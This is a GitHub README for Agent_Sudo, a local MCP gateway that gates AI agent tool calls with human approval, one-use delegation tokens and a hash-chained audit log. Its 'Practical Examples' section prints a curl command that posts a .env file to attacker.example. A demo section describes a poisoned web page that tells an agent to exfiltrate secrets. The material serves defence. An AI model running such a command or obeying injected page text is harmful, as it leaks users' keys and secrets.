Agent_Sudo

Agent_Sudo is a local MCP permission gateway for AI agent tool calls. It lets a first-time evaluator see one high-risk action get blocked, narrowly delegated, allowed once, blocked again when the delegation is exhausted, and recorded in a tamper-evident audit log.

Evaluate Agent_Sudo in 5 Minutes

Start here if you are evaluating Agent_Sudo for the first time:

pipx install agent-sudo-mcp
agent-sudo --version

Then run the 5-minute evaluator path:

Evaluate Agent_Sudo in 5 Minutes

You should finish with this proof, without learning the internal architecture first:

blocked
↓
delegated
↓
allowed once
↓
blocked again
↓
audit verified

The evaluation uses only existing MCP server, delegation, audit-listing, audit-verification, and routing-verification functionality. If you are working from a source checkout and agent-sudo --version is stale, use python3 -m agent_sudo.gateway --version or reinstall the package in your active environment.

What You Will Validate

A critical shell request through agent-sudo-mcp does not execute by default.
A one-use delegation allows exactly one matching request.
The same request is denied after the delegation is consumed.
agent-sudo audit list shows the decisions.
agent-sudo verify-audit verifies the hash-chained audit log.
agent-sudo verify-routing reports configured routing and audit signals without claiming complete protection.

What Agent_Sudo Protects / Does Not Protect

What it is: a policy-and-provenance gateway with human approval gates, scoped delegation, and a tamper-evident (hash-chained) audit log — for the tool calls routed through it.

Protects:

Excessive agency — sensitive/critical actions (shell, critical file writes, external posts) require human approval before they run.
Untrusted-origin actions — actions whose provenance is external content (e.g. a fetched web page) are escalated or denied based on where the instruction came from, not its wording.
Tamper-evident audit — every decision is recorded to a SHA-256 hash-chained log that agent-sudo verify-audit can check for after-the-fact edits.
Scoped delegation — temporary, resource-limited tokens grant narrow access that expires automatically.

Does not protect:

Tools that bypass the gateway — a client's native tools or other MCP servers that don't route through Agent_Sudo are neither gated nor audited.
Prompt injection as a content-security problem — Agent_Sudo does not reliably detect injected instructions in prose. The built-in phrase detector is a best-effort tripwire that flags a few literal strings; the real protection is provenance-based escalation, not text matching.
OS-level isolation — it is not a sandbox; pair it with Docker/Firecracker for filesystem/process containment.
A compromised local environment — anyone with your local shell can approve pending actions or edit config directly.

See Trust Boundaries for the full table and the Security & Threat Model.

MCP Client Setup

After the 5-minute evaluation, wire the published MCP server into your MCP client:

pipx install agent-sudo-mcp
agent-sudo --version
agent-sudo init-approval
agent-sudo workspace set /ABS/PATH/TO/your/project
which agent-sudo-mcp

Add Agent_Sudo to Claude Desktop at ~/Library/Application Support/Claude/claude_desktop_config.json, using the absolute path returned by which agent-sudo-mcp:

{
  "mcpServers": {
    "agent-sudo": {
      "command": "/ABS/PATH/TO/agent-sudo-mcp",
      "args": []
    }
  }
}

Restart Claude Desktop, ask it to use an Agent_Sudo tool, then verify the action was routed through the gateway:

agent-sudo audit list

If the action is not listed, it bypassed Agent_Sudo. For the full setup and trust-boundary details, see the Claude Desktop Setup Guide.

Discoverability & Registry Status

📦 PyPI Package: agent-sudo-mcp v0.5.0 on PyPI
✅ Official MCP Registry: Active as io.github.Kisyntra/agent-sudo-mcp at registry.modelcontextprotocol.io
🌐 Glama Registry Listing: Live listing at glama.ai/mcp/servers/Kisyntra/Agent_Sudo
🛠️ MCP Server Integration: Read the MCP Server Setup Guide
🏢 GitHub Organization: Part of the Kisyntra ecosystem

Evaluation Story

A first-time MCP developer should evaluate one narrow story:

1. blocked: a critical shell request is not executed by default
2. delegated: the user grants one scoped, one-use token
3. allowed once: the exact matching request executes once
4. blocked again: the same request is denied after token exhaustion
5. audit verified: the decision log is listed and hash-chain verified

That story is the product activation path. Broader integration guides are reference material after this succeeds.

Supported Framework Examples

Agent_Sudo has pre-built example templates showing in-process integration for major Python agent frameworks:

✓ OpenAI Agents SDK — pre-wrapping assistant tool functions.
✓ PydanticAI — canonical end-to-end dogfood: a real (deterministic, offline) agent loop driving gateway decisions, real file I/O, scoped delegation, and verified audit.
✓ LangGraph — securing tool node execution and graph states (examples/langgraph_integration.py).
✓ agent-runtimes — registering the local tool hooks handler in config.

Why Agent_Sudo If I Already Use Docker?

A common question from security engineers and developers is: "Why do I need a policy gateway if I am already isolating my agents in a Docker container, gVisor sandbox, or Firecracker microVM?"

The difference is a separation of concerns:

Docker/Firecracker/Sandboxes answer: "Where can code run?" They isolate the process from the host operating system, preventing an agent from escaping to your local machine, but they do not monitor what the agent is doing inside the sandbox.
Agent_Sudo answers: "Should this action be allowed?" It operates at the intent and application logic level, evaluating the context, provenance, and authorization rules of individual actions before execution.

Practical Examples

Even inside a perfectly isolated Docker container, an agent with raw tool access can:

Exfiltrate Secrets: Run curl -X POST -d @.env https://attacker.example to leak your API keys. A VM allows outbound network requests by default; Agent_Sudo detects the source trust and target, blocking the exfiltration.
Write/Inject Code: Edit your project's main.py to insert a backdoor or dependency. While Docker prevents host pollution, it cannot prevent the agent from corrupting your project workspace. Agent_Sudo flags critical file edits and requires human confirmation.
Perform Social Engineering: Send automated emails, Slack messages, or Discord alerts to external users containing phishing links under the guise of the agent owner. Agent_Sudo gates communication tools based on user approvals.
Exceed Delegation Scopes: An agent running a automated build pipeline might accidentally or maliciously call tools outside its intended scope. Agent_Sudo uses temporary delegation tokens to automatically lock the agent out once its quota or time-to-live expires.

These two layers are complementary: use Docker/VM sandboxes to isolate environment resources, and use Agent_Sudo to validate tool execution intent. For a detailed technical breakdown, see Agent_Sudo vs. Container/VM Sandboxes.

Important

Security Boundaries Notice:

Gateway, Not a Sandbox: Agent_Sudo is a local permission gateway and policy engine; it is not an OS-level sandbox or container. It gates tool access but does not isolate filesystem or process resources.
Best-Effort Shell Filtering: Shell command policy checks are best-effort unless reinforced by OS-level containment or custom runtime sandboxes.
Client Runtime Bypass: Native tools registered directly in host runtimes (e.g., Eino, Hermes) can bypass Agent_Sudo entirely unless those tools are disabled or explicitly routed through this gateway.

Trust Boundaries: What Is and Is Not Protected

Agent_Sudo only sees the tool calls that are routed through it. This is the single most important thing to understand before relying on it.

✅ Protected	❌ Not protected
Tool calls made through the `agent-sudo` MCP server (file reads/writes, shell, network) — gated, classified, and logged	A client's own native/built-in tools (e.g. Claude Desktop's built-in file or web tools) that don't go through the `agent-sudo` server
Any runtime where dangerous tools are disabled or explicitly proxied through the gateway	Other MCP servers you've installed that expose filesystem/shell/network directly to the agent
Intent-level decisions: provenance, approval gates, delegation scopes, audit	OS-level isolation (use Docker/VM for that — see comparison)

How to make sure you're actually protected:

Route the agent's risky capabilities through the agent-sudo MCP server (see the Claude Desktop Setup Guide).
Disable or remove other tools that grant the agent direct file/shell/network access and bypass the gateway.
Verify with the audit log. Ask the agent to perform an action, then run agent-sudo audit list. If the action is recorded, it went through the gateway. If it is not in the log, it bypassed Agent_Sudo and was not protected — that capability still needs to be disabled or routed through the gateway.

This is a deliberate scope choice, not a defect: Agent_Sudo governs intent and authorization for the tools it mediates. Pair it with OS-level isolation (Docker/Firecracker) for environment containment.

Core Features

Approval Gates: Prompts for interactive confirmation (CLI yes/no) on sensitive actions, and requires a local passphrase for critical actions (e.g., running shell commands).
Protected Reads: Automatically blocks reads targeting private files such as credentials, configuration folders, and shell startup scripts.
Critical Write Detection: Upgrades ordinary file writes to critical status if the target is executable code or configuration files.
Scoped Delegation: Allows humans to issue temporary, resource-limited permission tokens (e.g., allow read access to /path/to/project for 2 hours, max 10 uses).
Audit Logs: Records all tool attempts and gateway decisions to a local JSONL log file secured with a SHA-256 hash chain to detect log tampering. Review them in a human-readable table with agent-sudo audit list, or verify integrity with agent-sudo verify-audit.
Claude Desktop / MCP Support: Implements the Model Context Protocol (MCP) to plug directly into Claude Desktop as a stdio server.

Additional Demos

After you complete the 5-minute evaluator path, these demos show adjacent scenarios.

Built-In Policy Demo

Run a local dry-run policy demo:

agent-sudo demo

This is useful for seeing policy decisions quickly. It is not the primary activation path because it does not show the full MCP deny -> delegate -> allow once -> deny exhausted loop.

Provenance Blocking Demo

See provenance-aware policy enforcement in ~60 seconds. An agent reads a poisoned web page that tells it to exfiltrate your .env. Agent_Sudo denies the action because its origin is untrusted external content — not because it parsed the malicious wording — while allowing the user's own work, and writes a tamper-evident audit log. The decision turns on where the instruction came from, independent of how the injection is phrased.

The demo lives in the repository (it is not part of the PyPI package), so clone first:

git clone https://github.com/Kisyntra/Agent_Sudo
cd Agent_Sudo/examples/exfil_demo && python demo.py

Walkthrough and expected output: examples/exfil_demo/.

Contributor Setup

If you are developing Agent_Sudo or integrating it with a custom runtime:

# Clone the repository
git clone https://github.com/Kisyntra/Agent_Sudo.git
cd Agent_Sudo

# Install in editable mode
python3 -m pip install -e .

To run unit tests:

python3 -m unittest discover -s tests

Ecosystem

We work with agent runtime maintainers and external implementers to define portable authorization and audit standards:

Official Integrations:
- agent-runtimes — Merged (PR #98) local plugin hook handler (agent_sudo_local).
Active Implementations:
- LexFlow — In-progress design review (#124) for native JS/TS client audit logging and verification.
Research & Local PoC:
- Hermes — Experimental architecture research (#34992) targeting registry-level dispatch gating.
Public Listings:
- Official MCP Registry — Active listing as io.github.Kisyntra/agent-sudo-mcp.
- Glama MCP Registry — Active, verified listing with introspection tests.

For a full compatibility matrix and integration details, see the Ecosystem Status Guide.

Documentation Directory

Directory / Section	Topic	Key Files
Evaluation	First-time activation path	Evaluate in 5 Minutes • First Run Reference
Troubleshooting	Diagnostics and resolution steps	docs/troubleshooting.md
Integrations	Connecting to runtimes and IDEs	docs/integrations/overview.md • Ecosystem Status • Outreach Playbook • Adoption Dashboard • Discoverability Notes • LexFlow Readiness • LexFlow Checklist • Claude Desktop • MCP Setup • agent-runtimes • Hermes (Research)
Framework Integrations	Direct SDK gating for agent frameworks	LangGraph Integration Guide • examples/langgraph_integration.py
Architecture	Abstractions and core pipelines	docs/architecture/overview.md • Layered Architecture • Enforcement Model
Specifications	Language-agnostic standard models	spec/runtime_compatibility_levels.md • Universal Schema • Policy & Audit • Interoperability Test Kit
Security	Threat modeling and limits	docs/architecture/security_model.md
Comparisons	Policy vs Container Sandboxes	Docker & Firecracker comparison

CI/CD & Release Automation

Agent_Sudo uses GitHub Actions to automate checks and distribution:

Continuous Integration: The CI workflow runs on all pushes and pull requests targeting the main branch, running the unittest suite, scanning for personal path disclosures, executing git diff --check whitespace validation, and verifying Python package compilation.
Automated Releases: Releases are generated automatically when a git tag matching v* is pushed.
- Release candidate tags (e.g. v0.4.0-rc12) are published as GitHub Prereleases and are explicitly excluded from being marked as the latest release.
- Release notes are automatically parsed and extracted from the matching version entry in CHANGELOG.md.

Name		Name	Last commit message	Last commit date
Latest commit History 121 Commits
.github/workflows		.github/workflows
agent_sudo		agent_sudo
assets		assets
docs		docs
examples		examples
scripts		scripts
spec		spec
tests		tests
.gitignore		.gitignore
CHANGELOG.md		CHANGELOG.md
CONTRIBUTING.md		CONTRIBUTING.md
Dockerfile		Dockerfile
LICENSE		LICENSE
README.md		README.md
SECURITY.md		SECURITY.md
pyproject.toml		pyproject.toml
server.json		server.json

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Agent_Sudo

Evaluate Agent_Sudo in 5 Minutes

What You Will Validate

What Agent_Sudo Protects / Does Not Protect

MCP Client Setup

Discoverability & Registry Status

Evaluation Story

Supported Framework Examples

Why Agent_Sudo If I Already Use Docker?

Practical Examples

Trust Boundaries: What Is and Is Not Protected

Core Features

Additional Demos

Built-In Policy Demo

Provenance Blocking Demo

Contributor Setup

Ecosystem

Documentation Directory

CI/CD & Release Automation

About

Uh oh!

Releases 25

Packages

Uh oh!

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

Agent_Sudo

Evaluate Agent_Sudo in 5 Minutes

What You Will Validate

What Agent_Sudo Protects / Does Not Protect

MCP Client Setup

Discoverability & Registry Status

Evaluation Story

Supported Framework Examples

Why Agent_Sudo If I Already Use Docker?

Practical Examples

Trust Boundaries: What Is and Is Not Protected

Core Features

Additional Demos

Built-In Policy Demo

Provenance Blocking Demo

Contributor Setup

Ecosystem

Documentation Directory

CI/CD & Release Automation

About

Topics

Resources

License

Contributing

Security policy

Uh oh!

Stars

Watchers

Forks

Releases 25

Packages 0

Uh oh!

Uh oh!

Contributors

Uh oh!

Languages

Packages